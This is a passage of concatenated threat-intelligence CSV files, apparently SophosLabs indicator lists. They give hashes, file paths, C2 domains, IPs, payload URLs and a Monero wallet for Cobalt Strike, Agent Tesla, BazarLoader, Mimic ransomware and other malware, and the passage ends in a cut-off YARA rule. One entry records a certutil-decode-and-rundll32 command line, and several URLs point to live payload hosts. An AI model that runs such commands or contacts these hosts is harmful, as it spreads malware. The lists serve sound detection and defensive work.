file_path_name,C:\programdata\microsoft\EdgeUpdate\msiconf.dll,https://www.virustotal.com/gui/file/11c7728697d5ea11c592fee213063c6369340051157f71ddc7ca891f5f367720/relations 
-------------------------------------------------------------------------------- /STAC6451_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data ,Note 2 | sha256,558147caa20eddf708986e89d7f000809025c5ade03fda1f352dba513e8f1454,An executable suspected to be a Cobalt Strike beacon dropped by the TA 3 | file_path_name,C:\ProgramData\Plug\tosbtkbd.exe,An executable suspected to be a Cobalt Strike beacon dropped by the TA 4 | sha256,804de08fb28dcae51efca2960de3dc9460114fc8d376ad6a966144cb55aa9f75,Cobalt Strike Loader 5 | file_path_name,C:\users\public\downloads\USERENV.dll,Cobalt Strike Loader 6 | sha256,d13b43518d0ed2fe938e186eb218debd15022b9803c0d330363ca40830db9a77,Hex encoded DLL in Cobalt Strike loader (userenv.dll) 7 | sha256,ae7031dfae21616d7eec326c16ebac7f9d911a354ba32dd4b4c458fe50351805,Malicious DLL - CLR_module.dll 8 | file_name,CLR_module.dll,Malicious DLL - CLR_module.dll 9 | sha256,04ba9dd2d3127511af52e1be3015e0424491cfb2133f90f8b5b5cac2e33166d4,Malicious file (Mal/Generic) detected on machine 10 | file_path_name,C:\Windows\ServiceProfiles\MSSQLSERVER\AppData\Local\Temp\TmpFC18.tmp,Malicious file (Mal/Generic) detected on machine 11 | sha256,89672638152c13d10ae8afa03df7798081d025939bcfae354e8540cdda2cf16a,Malicious file renamed from C:\users\public\downloads\1.png 12 | file_path_name,C:\users\public\downloads\tosbtkbd.dll,Malicious file renamed from C:\users\public\downloads\1.png 13 | sha256,549a883cb3d923eb0b45248d6f46bd2859a3265f203e6019f3e4b9df6c9f9813,Mimic ransomware executable 14 | file_name,oto.exe,Mimic ransomware executable 15 | sha256,d04904e32b5cb0f9b559855fac81d62c6ad0472dc443be02f08b6fe4a7d56f71,Observed TA command execution through this binary 16 | file_path_name,C:\Users\Public\Sophosx64.exe,Observed TA command execution through this binary 17 | sha256,73de5c6390f26133f20208367c4398798fd4dc1e9986bdfb7fea9288f4f53efa,Payload dropper 18 | 
file_path_name,C:\users\public\music\build.txt,Payload dropper 19 | sha256,0964ec866b24eea67c8e7b11060acbf9455e182d0ff97987114c291d29e54f73,PrintSpoofer 20 | file_path_name,C:\windows\temp\POZ.exe,PrintSpoofer 21 | sha256,4e5ec0db67045bdc008e949214bea81a5d1e4c1e0de211159f0e9d7d33ecbf7a,Ransomware launcher binary 22 | file_path_name,C:\users\public\music\pp2.exe,Ransomware launcher binary 23 | sha256,cdb0c28ec03ffbf66309d74d537b8157161cf775ee00a49398e97e4bf735d7d9,Related to mimic ransomware (troj/ransom-hcl - lab-97093) 24 | file_name,1ks.txt,Related to mimic ransomware (troj/ransom-hcl - lab-97093) 25 | sha256,81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72,Related to mimic ransomware (troj/ransom-hcl) 26 | file_name,2ks.txt,Related to mimic ransomware (troj/ransom-hcl) 27 | sha256,27527809c3a2219f20dbf8b33662eb488c0d32e978d1401fcbe912e8c267128a,Used to run build.txt and safeboot the network 28 | file_path_name,C:\users\public\music\01.bat,Used to run build.txt and safeboot the network 29 | file_path_name,C:\users\public\music\03.bat ,Used to run build.txt and safeboot the network 30 | file_path_name,C:\users\public\music\02.bat,Used to run build.txt and safeboot the network 31 | sha256,a4e1a5b1489b316064f083c4cd7bfc83b70ee4684a4d97d1ad1c4e6d648161a3,webshell 32 | file_path_name,E:\Shrdbms_Web\web\js\info.aspx,webshell 33 | ip,91.203.134.122, 34 | url,https://jobquest.ph, 35 | ip,80.66.76.30, 36 | ip,194.26.135.76 , 37 | domain,times.windowstimes.online, -------------------------------------------------------------------------------- /Troj-AgentTesla.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | sha256,af0eeca2ba88ec11bbbcfa46a3976ac80904b98a68eaccb7236f096a51cfcb7b,Agent Tesla loader packed installer (older type) 3 | sha1,73b814d8eb2b47b2d4be1be8c9efe365cd43badd,Agent Tesla loader 4 | sha1,22216dfc1e168e188e4f10236368bda51a550d79,Agent Tesla loader - reader DLL 5 | 
sha1,7b87c864a7157ee8d6bab9f471110b848ac7a91d,Agent Tesla loader - RunPE DLL 6 | sha1,ae10b34487219fad4002de03b0fa848950461dc1,Troj/Tesla-AW 7 | sha256,90c99275bfea4f4084d07b4a0a044f81e6c9fbe19fba688a7fe8a0be46004acf,First stage Downloader for Agent Tesla 8 | sha1,aea98d7b068b0c418d1b3d96537e848aeb4440c0, Agent Tesla Loader Stage 2 9 | sha1,196623be81dbe59e560aba504d081c54b23b822,Troj/Tesla-BE 10 | sha256,5ace35afbf13d16d5b21ae38befde4a0418c4fffabe3c09f06888eb5aa83c063,Downloader for Agent Tesla 11 | sha256,c1fa48c0b9c81541dc2ba39db3fc1c410f6231e8df9aa69c02bdd1c8549b453a,Downloader for Agent Tesla 12 | URL,https://hastebin.com/raw/opozuvaril,source document for Agent Tesla downloads 13 | URL,https://hastebin.com/raw/usejavazuv,source document for Agent Tesla downloads 14 | sha1,27a8473b2817fd75eeed9995d67ca9c2761131fa,Agent Tesla v2 15 | sha1,3cb0429986c10dc6eb2cb4d242cef112014e20e1,Agent Tesla v2 16 | sha1,42fb3937aff3b4d245fb221e4b54334b76f56bf6,Agent Tesla v2 17 | sha1,45c4c2b9ce3b2b14e86389eb3c129fe930b6f765,Agent Tesla v2 18 | sha1,671333726bcbe73bc5344f827aca50b1b4c7f32b,Agent Tesla v2 19 | sha1,5d8e29c210eff0c6f8066293b804333e61c42285,Agent Tesla v3 20 | sha1,98b45781cfaa31b38873ec716603578f13ec1049,Agent Tesla v3 21 | sha1,8e90a85256b4670daaf4c59a518d80efd0be9a39,Agent Tesla v3 22 | sha1,a458b19290921bd73d6c8d665eb79cd9978577f3,Agent Tesla v3 23 | sha1,7bb14616fd3a35798f38a919c9dd73f240c9464b,Agent Tesla v3 -------------------------------------------------------------------------------- /Troj-BazarBackdoor.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to the BazarLoader App Installer attack,https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ 3 | sha-256,c268bcfc1a86038c6e3239f9c180bfb7b64070bd5f5705aa8c78eaf48a1d0879,Adobe.appinstaller 4 | 
sha-256,9cc1eb38573dab0f77bf68ade1c405202a5eaa348f71fd17475e382ec686464f,Adobe_1.2.0.0_x64.appx 5 | sha-256,5814f2fd96f79f8bd036a5897c12aa2d46bd707007f8b212a7a6e2220fcc206d,Adobe_1.7.0.0_x64.appx 6 | sha-256,3da7decd89b75a0394e4ea2dd457eb50c58d99323eadc4e2b45b2664a4c57f1c,Adobe_1.7.0.0_x64.appx 7 | sha-256,17d76d6066c983e94d9a83a8e274c2e94d4f1bb4fbe14837bac3287357e02550,Adobe_1.7.0.0_x64.appx 8 | sha-256,a5ce2bdd42fb0c9f51e218c879cc1d492a02cc096b3f0776482c98a63f6a3061,Adobe_1.7.0.0_x64.appx 9 | sha-256,f7872201d5d1047b13210efcb7c4e339e87a5be614609d9d031b5e72afdac16a,Adobe_1.7.0.0_x64.appx 10 | sha-256,06e2545b339a3f79f663988450970cc058f5061f4e0e3a57c172dc1b467ede98,Adobe_1.7.0.0_x64.appxbundle 11 | sha-256,4f5d04dbfdcf0417a1a684905bd63f6d84318379cacdb327b0ee938e51a6338c,Adobe_1.7.0.0_x64.appxbundle 12 | sha-256,3acde97a7e72bec3154e52db25c0e6bb5039be8194f5c1c51385307e72be174d,Adobe_1.7.0.0_x64.appxbundle 13 | sha-256,241c65c57f3d554ca9c65e03c9fab6fcb9856636e25d2ec34cf43a2df5c5e743,Adobe_1.7.0.0_x64.appxbundle 14 | sha-256,f35146695e848765a89c69439732fbd72a784288ff7e898d34c729cdc83442dd,Adobe_1.7.0.0_x64.appxbundle 15 | sha-256,f88fb86ed586f75897e7ace07228f55e9261ff8ae9ced2725b4b67aa8dfcae10,Adobe_1.7.0.0_x64.appxbundle 16 | sha-256,ff158e1e58beb2059747936fbc47c45450bc3429a582376594d8662ff8edf024,data.dll (DragTest.exe) 17 | sha-256,e0e2d3b1ca9bfedc671a1f1a7f274b399287c112671ef02d7eeac12a822aa2dc,data.dll (DragTest.exe) 18 | sha-256,846752d746a8fa749fa27d11190a43f5bebde4925ca2e767a7d231b8ffd6d0c8,data.dll (DragTest.exe) 19 | sha-256,8d96965c940c90b1d8b865cf7774a4e6b4f54f686f07fa63479f591e3ded4f23,data.dll (DragTest.exe) 20 | sha-256,6c424efeb2b528ba5396c903fcef1fc8f2f04452deea5160d149723473528db9,data.dll (DragTest.exe) 21 | sha-256,9f3cc120479a68b3ddee7dc0dbffdc9e598968ec53b623a222b3ac7c49661bf1,data.dll (DragTest.exe) 22 | sha-256,b275d8fbc140c8ee81b357cc1691d7da86987bf864d618634191b54c3e2b192d,SecurityFix.exe 23 | 
sha-256,b20c155f9f13d31b79ae5da6df0a14677c26408c5f65b84b68a40a1fa9808863,SecurityFix.exe 24 | sha-256,6d0b343d692fc6441c49cda331e259d51d1543824526090aba89d987bbbb6924,SecurityFix.exe 25 | sha-256,b6ebc8664a09388d2cc3832a1c702eb8eb41f619f7933f1912d5e10c1fa4444e,SecurityFix.exe 26 | URL,hastrama.com/segment/billion,C2 URL 27 | URL,dfgerta.com/segment/billion,C2 URL 28 | URL,adobeview.z13.web.core.windows.net/Adobe.appinstaller,source URL 29 | URL,storage.googleapis.com/adobe-pdf-review/report.html,source URL 30 | URL,adobeview.z13.web.core.windows.net/report.html,source URL 31 | URL,storage.googleapis.com/preview-pdf/report.html,source URL 32 | URL,openpdf.z5.web.core.windows.net/report.html,source URL 33 | URL,adobe-views.azurewebsites.net/report.html,source URL 34 | URL,adobe-pdf-review.azurewebsites.net/Adobe.appinstaller,source URL 35 | URL,adobe-pdf-review.azurewebsites.net/report.html,source URL 36 | ssl_certificate_serial,309368b122ab63103dddd4ad6321a82c,Signing certificate serial # 37 | domain,asdlfkasklf.com,C2 domain 38 | domain,aslflasf.com,C2 domain 39 | domain,dfgerta.com,C2 domain 40 | domain,falomana.com,C2 domain 41 | domain,gakosafd.com,C2 domain 42 | domain,gasdfasdf.com,C2 domain 43 | domain,hansdfps.com,C2 domain 44 | domain,hastrama.com,C2 domain 45 | domain,holarty.com,C2 domain 46 | domain,holydolyna.com,C2 domain 47 | domain,jaortamnana.com,C2 domain 48 | domain,jaratymanr.com,C2 domain 49 | domain,jarghan.com,C2 domain 50 | domain,jhabv.com,C2 domain 51 | domain,joramanmnb.com,C2 domain 52 | domain,joramanmnbman.com,C2 domain 53 | domain,jptymana.com,C2 domain 54 | domain,kartynab.com,C2 domain 55 | domain,kjraeiba.com,C2 domain 56 | domain,koralaba.com,C2 domain 57 | domain,koratanaba.com,C2 domain 58 | domain,koratyma.com,C2 domain 59 | domain,korayaba.com,C2 domain 60 | domain,kormala.com,C2 domain 61 | domain,lolalvatan.com,C2 domain 62 | domain,maratanab.com,C2 domain 63 | domain,nanbaora.com,C2 domain 64 | domain,naratymena.com,C2 
domain 65 | domain,olagamanas.com,C2 domain 66 | domain,qwasdfp.com,C2 domain 67 | domain,romotara.com,C2 domain 68 | domain,zxonazxc.com,C2 domain 69 | domain,adobeview.z13.web.core.windows.net,source domain 70 | domain,adobepdf.z13.web.core.windows.net,source domain 71 | domain,adobe-view.azurewebsites.net,source domain 72 | domain,adobe-pdf-review.azurewebsites.net,source domain 73 | -------------------------------------------------------------------------------- /Troj-BazarLd.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors/, 3 | MD5,21807bf30699429100f07c674e9f52f0,BazarCall .xlsb payload 4 | MD5,441a9b57a778665b0689986265a59caf,BazarCall .xlsb payload 5 | MD5,494e8dc63210ed59ab012ebb5be1a283,BazarCall .xlsb payload 6 | MD5,c941c4a83663fa976cf0367844900bc6,BazarCall .xlsb payload 7 | MD5,c9ea53bdb7010f189f3c4566a854c543,BazarCall .xlsb payload 8 | sha256,44c15c76277adcfa5fa07b746c7083a4ee874751b678091edd56a003b0312c9c,BazarCall .xlsb payload 9 | sha256,71CD6CB93FCF508761B72FAC05BC96A07697718EB928C72FC7731DAB457B3606, 10 | sha256,52bbe09c7150ea66269c71bac8d0237fb0e6b0cae4ca63ab19807c310d6a1a0b,AnnualReport.exe sample originally hosted on Slack 11 | sha1,E53166CA0F09AD46795CD8F5A1C9A4A2D5B21415,BazarCall .dll payload 12 | sha1,634892C91F5DDFAB0891FE7E004E50E46FE60CEF,BazarCall .dll payload 13 | sha1,165403FD23EE320564B9B455F234B60B02BA1FF8,BazarCall .dll payload 14 | sha1,52458F4E9449A66235486CD8ADB52FD2DE332814,BazarCall .xlsb payload 15 | sha1,8A487C189EDD6E3CC32CEE7709AA4E0C21D07491,BazarCall .dll payload 16 | sha1,52458F4E9449A66235486CD8ADB52FD2DE332814,BazarCall .xlsb payload 17 | sha1,D86639B31A7EB172C064C72788D1FBF4DC1440E6,BazarCall .xlsb payload 18 | sha1,D3213224DAD1803840F7878BCC1DF85CA38DEED2,BazarCall .xlsb payload 19 | 
sha1,CF0FCC2C856E800B360E545359FCA9A367489424,BazarCall .doc payload 20 | sha1,634892C91F5DDFAB0891FE7E004E50E46FE60CEF,BazarCall .dll payload 21 | sha1,3B52CC3F5C58316827C183D664E21344993A5502,BazarCall .xlsb payload 22 | sha1,E0AEF96555318BAC394065C9721C0310CA0DF091,BazarCall .dll payload 23 | sha1,3B52CC3F5C58316827C183D664E21344993A5502,BazarCall .xlsb payload 24 | sha1,BDB0E0889D3EC7AF0398B08ECE2F45ED1844D85D,BazarCall .dll payload 25 | certificate serial,21e3cae5b77c41528658ada08509c392,serial number for the digital signing certificate issued to Network Design International Holdings Limited used to sign some Bazar executables 26 | ssl_certificate,06765c5f039002c614a35d36a14597e86ef20370,TLS certificate serial number for CN = amadeamadey.at OU = Amadey Org O = Amadey TM L = Bohn S = Bohn C = AT 27 | command_line,"cmd.exe /c certutil -decode %PUBLIC%\{sample.123} %PUBLIC%\{sample.456} && rundll32 %PUBLIC%\{sample.456},{function)", 28 | path,%PUBLIC%, 29 | path,c:\users\public\, 30 | domain,australiatourism.bazar, 31 | domain,bestsightsofwildaustralia.bazar, 32 | domain,restinaustraliaplace.bazar, 33 | domain,sightsofsydney21.bazar, 34 | domain,sydneynewtours.bazar, 35 | domain,vacationinsydney2021.bazar, 36 | -------------------------------------------------------------------------------- /Troj-BuerLd-A.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs of a Buer Loader attack tied to Ryuk ransomware,https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service 3 | sha256,5b607f001ba62e042344d30b65cad2774df2deb50e0b92c33da85e9338c123c4,Buer Loader unpacked malware 4 | sha256,6c7f43434e5db8703c0a47dedeeab976159d8704bfbe2e4ff65405f38d508e9d,Buer Loader dropper 5 | filename,print_document.exe,Buer Loader dropper 6 | ip,104.248.83.13,Buer Loader command and control IP 7 | 
sha256,32616f41a71fc7a4286736a6fc77da2a555dbc8301a8bd5fbdbab231955a42c5,Buer Loader dropper 8 | filename,RTM.DLL,Buer Loader dropper 9 | sha256,10943b90969722bf359e4b039d2953e02072e03e0a7f1bdb1dea09d9197288b1,Buer Loader dropper -------------------------------------------------------------------------------- /Troj-DocDL-AEOL.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to the CABless CVE-2021-40444 maldoc RAR attack,https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/ 3 | sha-256,170eaccdac3c2d6e1777c38d61742ad531d6adbef3b8b031ebbbd6bc89b9add6,Profile.rar attachment 4 | sha-256,d346b50bf9df7db09363b9227874b8a3c4aafd6648d813e2c59c36b9b4c3fa72,Document.docx 5 | sha-256,776df245d497af81c0e57fb7ef763c8b08a623ea044da9d79aa3b381192f70e2,Formbook payload (abb01.exe) 6 | sha-256,95e03836d604737f092d5534e68216f7c3ef82f529b5980e3145266d42392a82,Profile.html 7 | IP,104.244.78.177, 8 | URL,hxxp://104.244.78.177/abb01.exe,Formbook payload (abb01.exe) 9 | -------------------------------------------------------------------------------- /Troj-KilllSomeOne.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs of KilllSomeOne malware,https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone 3 | sha256,085d67b6051e1ed53d20b8602d4d0f98ecd35f7a,KillSomeOne malicious DLL loader 4 | sha256,1c45ea4338bcb17ce29f0efae6dea0944ea768d3,KillSomeOne malicious DLL loader 5 | sha256,be8a9509e63110cc5659ba2a8dc03c3bfbe0a10d,KillSomeOne malicious DLL loader 6 | sha256,bf22ee46c7953040c00d3bfa63b52c3cff20b9fa,KillSomeOne malicious DLL loader 7 | sha256,9c959ffa4b5a2f75b3d50083b6dbf0cd21c140b7,KillSomeone Loader 8 | file_path_name,C:\Users\B\Desktop\0.1\major\UP_1\Release\akm.pdb,PDB path in strings for KillSomeone 9 | 
file_path_name,C:\Users\B\Desktop\0.1\major\UP_1\Release\functionhex.pdb,PDB path in strings for KillSomeone 10 | file_path_name,C:\Users\B\Desktop\0.1\major\UP_1\Release\hex.pdb,PDB path in strings for KillSomeone 11 | file_path_name,C:\Users\guss\Desktop\Recent Work\UDP SHELL\0.7 DLL\UDPDLL\Release\UDPDLL.pdb,PDB path in strings for KillSomeone 12 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\Function_hex\hex\Release\hex.pdb,PDB path in strings for KillSomeone 13 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\hex\hex\Release\hex.pdb,PDB path in strings for KillSomeone 14 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\msvcp\Release\DismCore.pdb,PDB path in strings for KillSomeone 15 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\msvcp\Release\mpsvc.pdb,PDB path in strings for KillSomeone 16 | ip,160.20.147.254,KillSomeOne C&C server -------------------------------------------------------------------------------- /Troj-Miner-AED.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to cryptomining infections following exploitation of CVE-2019-18935,https://news.sophos.com/en-us/2022/06/15/telerik-ui-exploitation-leads-to-cryptominer-cobalt-strike-infections 3 | sha256,89eb0b66022dc2e5ac1e86b01fb833ebdbf94ee2ac276c9b3bebb3117058a7b0 ,Cobalt Strike 4 | sha256,09bfa448e4bbea8fe36be6962b963cfadf764593e03b314c9ce81f9b2cff1349 ,Cobalt Strike 5 | sha256,eadbfd03da46bc719b7c6723c12ddaa30599ae1648c7e16c1c04cd4735c031ac ,setup192.exe - dropper 6 | sha256,e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855,setup192.exe - dropper 7 | sha256,210035d092b7c2bf79303b32952f2fa74363b2381743f5a0caadb9204f665712 ,Cobalt Strike 8 | sha256,75f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50 ,crby26td.exe / 7q5t6057.exe - XMRig Miner 9 | 
sha256,f3c70fe17d07e47c50c5a62de4e2b40bdeee45533133b1809c400c49660be643 ,a.json - XMRig Miner configuration file 10 | sha256,dae5dbbee83b4e8cf9c9037b329a77f65cd2072df10a62809470f6b816aee49b ,uutfgfiy.exe / baopiwac.exe - creates/connects to pipe 11 | sha256,7a9ad48dea2dde18b743d3412ebd7bf7e51a24b5a0273fc9eb042301bb68d6f1 ,tuh25o6n.exe - downloader 12 | url,212.192.241.155/up/setup.exe,Dropper 13 | url,212.192.241.155:8000/a,"Gunzip/XOR-encoded PowerShell, loads Cobalt Strike DLL in memory" 14 | ip,212.192.241.155  ,C2 15 | user_agent,Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07),Cobalt Strike beacon 16 | ip_port,212.192.241.155:8000,C2 17 | file_path,C:\Windows\Temp\1652027208.9841497.dll  ,Cobalt Strike DLL 18 | file_path,C:\Windows\Temp\setup192.exe  ,Dropper 19 | file_path,C:\Users\Public\setup192.exe,Alternative path for dropper 20 | file_path,C:\Windows\Temp\crby26td.exe ,XMRig Miner 21 | file_path,C:\Windows\Temp\7q5t6057.exe ,XMRig Miner 22 | file_path,C:\Windows\Temp\a.json ,XMRig Miner configuration file 23 | file_path,C:\Windows\Temp\baopiwac.exe ,Creates and connects to pipe 24 | file_path,C:\Windows\Temp\uutfgfiy.exe ,Creates and connects to pipe 25 | file_path,C:\Windows\Temp\tuh25o6n.exe ,Downloader 26 | monero_address,45cxV8wsD3kRhsnZVD31xtPTNXrpdarsjRSUqUzajuTwC2KACGYArp7dZ9BJs8RKFb7MGcxAcn9RoVAVP1Es5HNk6MTdZZu,From XMRig Miner configuration file 27 | scheduled_task_path,ScheduledUpdate, 28 | -------------------------------------------------------------------------------- /Troj-PS-FX.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note,,,,,, 2 | Description,IOCs from https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack/,,,,,,, 3 | sha256,7d52bcd5845ef1d6c16717a299b5695bfb82b4d32c9cf259f5bff58f239df783,regthrgrwfgterw_Shady_AMSIBypassMaybe,,,,,, 4 | 
sha256,0a511648b1eb00f3eee4edaaa1fca683bbfc2fbb24923f334ba82485fd890f1b,Module_RunPsExecMaybe.ps1,,,,,, 5 | sha256,b61650ba0aa7497982a0bc189b3301f1f50a4a56094cce860dc05b52e96dce52,Module_ADRecon,,,,,, 6 | sha256,d7d6303b917b7dd69c3f16f01b3f23cfca44493531563dade8fa0f8bf863fce2,Module_RunByWMI.ps1,,,,,, 7 | url,https://bestsecure2020.com/gate,Module_RunByWMI.ps1 C2,,,,,, 8 | domain,bestsecure2020.com,Module_RunByWMI.ps1 C2,,,,,, 9 | sha256,6cb905dbfc2ab85f50eefa4e407246bf3733f06af94c4bf553fba85032a2f7e2,Module_GetAllServers.ps1,,,,,, 10 | sha256,226462c9f639e220f84401dcf6a535089cbe29df7a6502acab16da78134f3e8d,Module_GetDomainControllers.ps1,,,,,, 11 | sha256,2b5351d65ad6ed6df4ab8b6a0914bb9d0a686623b65db60be006371b255b1ced,Module_EnumerateAdmins.ps1,,,,,, 12 | sha256,e5cb6de8fd9be101a7e76e5345e1d7598756d997ff5cbfd96710d2027d79f75a,Module_Mod-EnumerateHyperV.ps1,,,,,, 13 | sha256,d208409abd2113e1888f6beeb436edc3336540148a341a12ac74ceecc626355d,"""bullet"" file",,,,,, 14 | url,https://astara20.com/jquery-3.3.1.min.js,,,,,,, 15 | domain,astara20.com,,,,,,, 16 | sha256,454afe23c5e0c3d535e5f0794e838ca98fb23a55181a657aa1004df814ea1ddc,"AMSI bypass script, 64-bit version",,,,,, 17 | sha256,19b0a642622fbf87b385200441bdda250cf0278063525ed6e35ba7210a75af2d,older powershell backdoor,,,,,, 18 | domain,estetictrance.com,,,,,,, 19 | url,https://estetictrance.com/gate,,,,,,, 20 | sha256,da8df0a03ece4e0920b4afc5a7cbcf23c931b6695393887600b39b555336f2ff,older powershell backdoor,,,,,, 21 | domain,againcome.com,,,,,,, 22 | url,https://againcome.com/gate,,,,,,, 23 | sha256,0e542de95da762d0d59c731ded5065ca0390eecde5c6972b5a58c52cae7f7c8d,older powershell backdoor,,,,,, 24 | domain,diametermes.com,,,,,,, 25 | url,https://diametermes.com/gate,,,,,,, 26 | sha256,76d1a3079b3ef08c5fbf4476f6479ddba0a5e20fd712e5b6acadafae6f817696,older powershell backdoor,,,,,, 27 | domain,diametermes.com,,,,,,, 28 | url,https://diametermes.com/gate,,,,,,, 29 | 
sha256,e496c41793b4eef1990398acd18deb25dd7e8f63148e3b432ff726d3dc5e1057,Cobalt Strike beacon 1b43dgyh.tzx,,,,,, 30 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 31 | sha256,ae013d2935b9520c834b39e24e0123421edf9c518665f199480ecc2a78d9a8d3,Cobalt Strike beacon ofkr2bgr.tky,,,,,, 32 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 33 | sha256,b5242d61a1a04f86e7e6f3f9724796497c3391bf7adde9a171f61b02084e5bdd,Cobalt Strike beacon phtkkakn.4u0,,,,,, 34 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 35 | sha256,91b4bc7ec03f217571b21c1cce333c2489e9aee597c3bb54a6c86738e9e7067d,cobalt.ps1,,,,,, 36 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 37 | sha256,ceacbccd98ab0f681e153f61869b6845b82ba0c730f007f73cc8a3af82ec78f8,"Chisel ""sophos.exe""",,,,,, 38 | sha256,0e715e38bb978cd745eac2d6ec1a083b3650452b36b6982c36559bb90a9218d3,"Chisel ""RCSLVWSUS_lms.exe""",,,,,, 39 | sha256,a8592747024715d3b0effdac95345bc8956e09823ff429887f4f9c56085515fa,bot.ps1,,,,,, 40 | sha256,850edeafd3924538ec806649ad6eeec66fd92916dbd4693bfa91c582c62299a5,igyigkhl.2uv.ps1,,,,,, 41 | sha256,92974d6b2fbe99876731bee124d7138b062ead6fab68dd2e5ddff8c52946f3ca,Mybot.ps1,,,,,, 42 | sha256,a8592747024715d3b0effdac95345bc8956e09823ff429887f4f9c56085515fa,vap05_bot.ps1,,,,,, 43 | sha256,4055c612a157016cb00025c9b024d052df4b6790108bb25dee2e7c78569ab102,MK64.dll,,,,,, 44 | sha256,136c32246b28a64cb22c5cdc6c33085886a4a59cf47344e9593793275bb8e849,C:\Windows\system32\lms.exe,,,,,, 45 | sha256,d4d3ef9196b5dac53d1e06d738eb3e529578752bf9e8cfd2900a600d5f10a7e5,host7.0.0.1.exe,,,,,, 46 | -------------------------------------------------------------------------------- /Troj-Ransom-GXS.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | 
Description,https://news.sophos.com/en-us/2023/07/18/sophos-discovers-ransomware-abusing-sophos-name/,"Indicators relating to ""Sophos"" ransomware" 3 | domain,xnfz2jv5fk6dbvrsxxf3dloi6by3agwtur2fauydd3hwdk4vmm27k7ad.onion,Tor (dark web) website used by the threat actor 4 | sha256,3da31ee0a6c6410b3c66aad41623d05aac61a4dbb85045eb89f5810ffdc93066,ransomware sample 5 | sha256,f15a0f660ef0bd9e116ff19b433451d403ffedea9469a095c2f429227500e87a,ransomware sample 6 | ip,179.43.154.137,C2 address used by the ransomware 7 | ip_port,179.43.154.137:21119,C2 address used by the ransomware 8 | url,hxxp://179.43.154.137:21119/api/new-config/[token]/, 9 | -------------------------------------------------------------------------------- /Troj-gootloader.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs of various payloads delivered by Gootloader,https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ 3 | Description,Threat hunting rule is available here,https://github.com/sophoslabs/IoCs/blob/master/Troj-gootloader.yara 4 | Description,SophosLabs is hiring threat hunters and malware analysts in Sydney & Budapest & Vancouver and Oxford-adjacent Abingdon, 5 | Description,Please visit https://careers.sophos.com/go/Sophos-Labs-Jobs/740302/ and apply today, 6 | SHA1,8731316018d005690046909f86b10a2130cfe75c,Cobalt Strike 7 | SHA1,04ac4430395e4bb5c8e78e3c6a277f108da36124,Gootkit 8 | SHA1,d7469da6a523239a9f2eee26d944aa9076c87bfa,Gootkit 9 | SHA1,f43b74c10c880546cf03014e253026736f01d1f9,Gootkit 10 | SHA1,2bc5babb780ffdd38f2ee61583ed2d036fd499d7,Kronos 11 | SHA1,7fde4507b2430e37c7dc9a1df8904371bc1bf9b2,Kronos 12 | SHA1,f2ddf525f9bf9e583cb6e2694e5abfac483660b2,Kronos 13 | SHA1,098b332b7a4f8712916d6a681799e390daaaef98,Registry loader 14 | SHA1,9771dc299da3aafd578a3182c63530315aff5726,Registry loader 15 | SHA1,dd98b9fce29bb291f37ef7ccf745ad3cdf5880b8,Registry loader 16 | 
SHA1,effb1d6d2a254c428fd3b726e5d10ba9c77a3ae6,Registry loader 17 | SHA1,f6525c66ab292d394ff7ec3da9beca8c45919788,Registry loader 18 | SHA1,02efc02a97e2223a85deea842eacebe9eb86aa0f,REvil 19 | SHA1,c51d97e76b018918504533ffdc05b06bae420912,REvil 20 | SHA1,f1acf90d5a42eba5b601ebe1b954be72d1c5b0b2,REvil 21 | IP,5.8.18.7,Gootloader mothership 22 | domain,my-game.biz,Gootloader mothership 23 | -------------------------------------------------------------------------------- /Troj-gootloader.yara: -------------------------------------------------------------------------------- 1 | /* 2 | Gootloader threat hunting yara rule 3 | Author: Gabor Szappanos, SophosLabs 4 | Date: 25 February 2021 5 | Reference: https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options 6 | */ 7 | 8 | rule Gootloader_JavaScript_infector 9 | { 10 | strings: 11 | $a1 = /function .{4,60}{return .{1,20} % .{0,8}\(.{1,20}\+.{1,20}\);}/ 12 | $a2 = /function [\w]{1,14}\(.{1,14},.{1,50}\) {return .{1,14}\.substr\(.{1,10},.{1,10}\);}/ 13 | $a3 = /function [\w]{1,14}\(.{1,50}\) {return .{1,14}.{1,10}\.length;.{1,4}}/ 14 | $a4 